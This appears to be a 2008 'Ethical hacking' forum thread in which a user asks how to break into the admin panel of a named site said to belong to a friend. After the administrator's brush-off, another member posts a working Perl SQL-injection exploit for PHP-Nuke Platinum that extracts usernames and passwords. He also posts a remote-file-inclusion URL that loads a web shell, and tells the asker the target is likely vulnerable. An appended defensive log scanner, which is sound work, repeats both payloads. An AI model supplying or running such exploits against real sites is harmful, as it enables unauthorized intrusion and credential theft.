Admin id and pw...

Discussion in 'Ethical hacking' started by Omen, May 18, 2008.

  1. Omen

    Omen New Member

    Joined: May 7, 2008
    Messages: 4
    Likes Received: 0
    Trophy Points: 0

    There is a site that I would like to get into..
    It is owned by a very good friend of mine and I want to see if I can get into it..

    here is the link: http://www.udiclan.net/admin.php

    Will someone tell me how I should get in that? :)
     
  2. shabbir

    shabbir Administrator Staff Member

    Joined: Jul 12, 2004
    Messages: 15,283
    Likes Received: 364
    Trophy Points: 83

    Ask your friend
     
  3. Omen

    Omen New Member

    Joined: May 7, 2008
    Messages: 4
    Likes Received: 0
    Trophy Points: 0

    Do you honestly think he would tell me?

    To be completely honest I really just would like to know. How and what would I use to get into that site? He is my friend though
     
  4. faizulhaque

    faizulhaque New Member

    Joined: May 23, 2008
    Messages: 213
    Likes Received: 3
    Trophy Points: 0
    Occupation: Student
    Location: Karachi

    Nice idea given by Mr. Shabbir
     
  5. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined: Jun 27, 2007
    Messages: 569
    Likes Received: 18
    Trophy Points: 0

    here u go

    dynamic_titles.php exploit
    Code:
    #!/usr/bin/perl
    #Inphex
    use LWP::UserAgent;
    use LWP::Simple;
    use IO::Socket;
    use Switch;
    #PHP-Nuke Platinum , Forums(Standart) - magic_quotes_gpc = OFF , SQL Injection
    #nuke_users Structure:
    #user_id 	name 	username 	user_email 	femail 	user_website 	user_avatar 	user_regdate 	user_icq 	user_occ 	user_from 	user_interests 	user_sig 	user_viewemail 	user_theme 	user_aim 	user_yim 	user_msnm 	user_password 	storynum 	umode 	uorder 	thold 	noscore 	bio 	ublockon 	ublock 	theme 	commentmax 	counter 	newsletter 	user_posts 	user_attachsig 	user_rank 	user_level 	broadcast 	popmeson 	user_active 	user_session_time 	user_session_page 	user_lastvisit 	user_timezone 	user_style 	user_lang 	user_dateformatuser_new_privmsg 	user_unread_privmsg 	user_last_privmsg 	user_emailtime 	user_allowhtml 	user_allowbbcode 	user_allowsmile 	user_allowavatar 	user_allow_pm 	user_allow_viewonline 	user_notify 	user_notify_pm 	user_popup_pm 	user_avatar_type 	user_sig_bbcode_uid user_actkey 	user_newpasswd 	last_ip 	user_color_gc 	user_color_gi 	user_quickreply 	user_allow_arcadepm 	kick_ban 	user_wordwrap 	agreedtos 	user_view_log 	user_effects 	user_privs 	user_custitle 	user_specmsg 	user_items 	user_trade 	points 	user_cash 	last_seen_blocker 	user_login_tries 	user_last_login_try 	user_gender 	user_birthday 	user_next_birthday_greeting
    #Description:
    #The file includes/dynamic_titles.php is vulnerable to SQL Injection - lines:  44 - 427
    #What about PHP-Nukes' SQL Injection Protection?
    #I could bypass its SQL Injection protection.
    #If the file maintenance/index.php is on the server you can see if magic_quotes_gpc are turned off.
    #You can of course edit the SQL Injection , file write is possible.
    #
    #Note: PHP-Nuke Platinum is very buggy,there are more bugs for sure(e.g. includes/nsbypass.php)
    print "usage $0 -h localhost -p / -t nuke_users -c username -id 2\n\n";
    $column = "username";
    $table  = "nuke_users";
    $uid    = 2;
    %cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-id" => "uid");
    
    $a = 0;
    foreach  (@ARGV) {
    	$a++;
    	while (($k, $v) = each(%cm_n_)) {
    		if ($_ eq $k) {
    			${$v} = $ARGV[$a];
    		}
    	}
    }
    &getit("http://".$host.$path."modules.php?name=Forums&p=-1'union+select-1,".$column."+from+".$table."+where+user_id='".$uid."","<title>(.*?)<\/title>");
    sub getit($$)
    {
    	$url = shift;
    	$reg = shift;
    
    
    	$ua = LWP::UserAgent->new;
        $urls = $url;
        $response = $ua->get($urls);
        $content = $response->content;
    
    	if ($content=~m/$reg/) {
    	    ($f,$s,$l) = split(">>",$1);
    	    $s =~s/ Post //;
    	    print $column.":".$s."\n";
    	}
    }
    


    and

    remote file inclusion vulnerability

    Vulnerability Type: Remote File Inclusion
    Vulnerable file: /Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php
    Exploit URL: http://localhost/Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php?nuke_bb_root_path=http://localhost/shell.txt?
    Method: get
    Register_globals: On
    Vulnerable variable: nuke_bb_root_path
    Line number: 24
    Lines:

    ----------------------------------------------
    $phpbb_root_path = 'modules/Forums/';
    include($nuke_bb_root_path . 'extension.inc');
    include($nuke_bb_root_path . 'common.'.$phpEx);



    Unless he has not updated his site, Platinum, which is the forum he is using, is vulnerable

    if u don't know how to do it then look up how to do it :)
     
    Last edited by a moderator: Jun 12, 2008
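
From the defender's side, both requests quoted in the post above leave a recognisable shape in a web server access log: a `p` value carrying a quote followed by `union ... select`, and a parameter (`nuke_bb_root_path`) whose value is itself a URL. The following is an added example, not part of the thread or of PHP-Nuke; the log lines are constructed and the names `classify` and `scan` are illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that is itself a URL: the remote-file-inclusion shape.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.I)
# A quote followed by UNION ... SELECT: the injection shape sent in p=.
UNION_RE = re.compile(r"""['"].*\bunion\b.*\bselect\b""", re.I | re.S)

# Constructed sample log (documentation IP range), not captured traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Jun/2008:10:00:01 +0000] "GET /modules.php?name=Forums&p=1523 HTTP/1.1" 200 5120
192.0.2.44 - - [12/Jun/2008:10:00:07 +0000] "GET /modules.php?name=Forums&p=-1'union+select-1,username+from+nuke_users+where+user_id='2 HTTP/1.1" 200 4875
192.0.2.44 - - [12/Jun/2008:10:00:09 +0000] "GET /modules/Forums/favorites.php?nuke_bb_root_path=http://localhost/shell.txt? HTTP/1.1" 200 312
192.0.2.10 - - [12/Jun/2008:10:00:12 +0000] "GET /index.php HTTP/1.1" 200 9001
"""

def classify(line):
    """Return a list of (label, parameter, value) findings for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    findings = []
    query = urlsplit(m.group(1)).query
    # parse_qsl percent-decodes and turns '+' into spaces before matching.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL_RE.match(value):
            findings.append(("rfi", name, value))
        if UNION_RE.search(value):
            findings.append(("sqli", name, value))
    return findings

def scan(log_text):
    """Map 1-based line numbers to their findings, skipping clean lines."""
    hits = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        found = classify(line)
        if found:
            hits[n] = found
    return hits

if __name__ == "__main__":
    for n, found in scan(SAMPLE_LOG).items():
        for label, name, value in found:
            print(f"line {n}: {label} in parameter {name!r}: {value!r}")
```

Any URL-valued parameter is flagged, so legitimate redirect-style parameters need an allowlist before this is used for alerting.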
